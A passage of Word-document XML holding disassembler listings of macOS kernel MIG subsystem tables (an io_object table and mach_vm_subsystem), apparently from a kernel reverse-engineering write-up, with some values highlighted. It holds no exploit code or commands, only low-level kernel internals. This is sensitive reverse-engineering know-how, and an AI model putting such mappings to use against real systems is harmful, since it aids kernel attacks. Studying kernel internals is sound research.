    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E05CD0                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>0B47h</w:t>
      </w:r>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 10C8h                ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq offset _Xio_object_get_class; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 2                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0B4h                 ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 4831E000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 3                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 db 30h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 30h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 4833A0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dq 2                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105D1E" w:rsidRPr="00105D1E" w:rsidRDefault="00105D1E" w:rsidP="00105D1E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105D1E">
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05CD0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027225E" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mach_vm_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 public mach_vm_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8 ; const mach_vm_subsystem mach_vm_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8 mach_vm_subsystem_0 dq offset mach_vm_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                                         ; DATA XREF: mach_vm_server_routine:loc_FFFFFF80003AA342o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                                         ; mach_vm_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03EF8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">12C0h </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03EF8                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">12D4h </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 102Ch                ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq offset _Xmach_vm_allocate; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 5                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03EF8                 dd 34h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 3AA54000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 5                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 3AA6B0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 7                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3BF6">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03EF8                 dd 3AA830h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF3BF6" w:rsidRPr="00BF3BF6" w:rsidRDefault="00BF3BF6" w:rsidP="00BF3BF6">
      <w:pPr>
        <w:rPr>
